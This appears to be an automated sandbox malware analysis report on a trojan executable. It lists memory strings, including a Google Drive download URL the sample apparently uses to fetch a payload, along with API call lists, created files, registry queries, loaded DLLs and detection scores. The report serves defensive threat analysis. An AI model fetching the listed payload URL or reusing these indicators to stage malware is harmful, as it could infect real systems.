      Source: Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloade
      Source: Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398996934.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384110868.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2271097553.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadic
      Source: Osb7hkGfAb.exe, 00000008.00000003.2361862879.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadid
      Source: Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2614036788.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadj
      Source: Osb7hkGfAb.exe, 00000008.00000003.2444083182.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2467614034.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2384044214.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2478681902.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640163854.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2502617431.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2432644762.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2410044735.0000000002E18000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2514090415.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt
      Source: Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2525054011.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2568940512.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2165382798.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2591061411.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2176353373.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2625599378.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2547558274.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2305365714.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2130363069.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt6
      Source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, 
Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.coml
      Source: Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comll
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File created: C:\Windows\resources\0809
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File created: C:\Windows\Arder.lnk
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_00406945 0_2_00406945
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_0040711C 0_2_0040711C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_6FF81A98 0_2_6FF81A98
      Source: Osb7hkGfAb.exe Static PE information: invalid certificate
      Source: Osb7hkGfAb.exe, 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe, 00000008.00000000.2026044066.0000000000458000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File created: C:\Users\user\tranchet
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File created: C:\Users\user\AppData\Local\Temp\nscD47A.tmp
      Source: Osb7hkGfAb.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Osb7hkGfAb.exe Virustotal: Detection: 68%
      Source: Osb7hkGfAb.exe ReversingLabs: Detection: 75%
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File read: C:\Users\user\Desktop\Osb7hkGfAb.exe
      Source: unknown Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: dwmapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: oleacc.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: ntmarta.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: version.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: shfolder.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: powrprof.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: wkscli.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: umpdc.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: wininet.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
      Source: Arder.lnk.0.dr LNK file: ..\Users\user\Disannex.And37
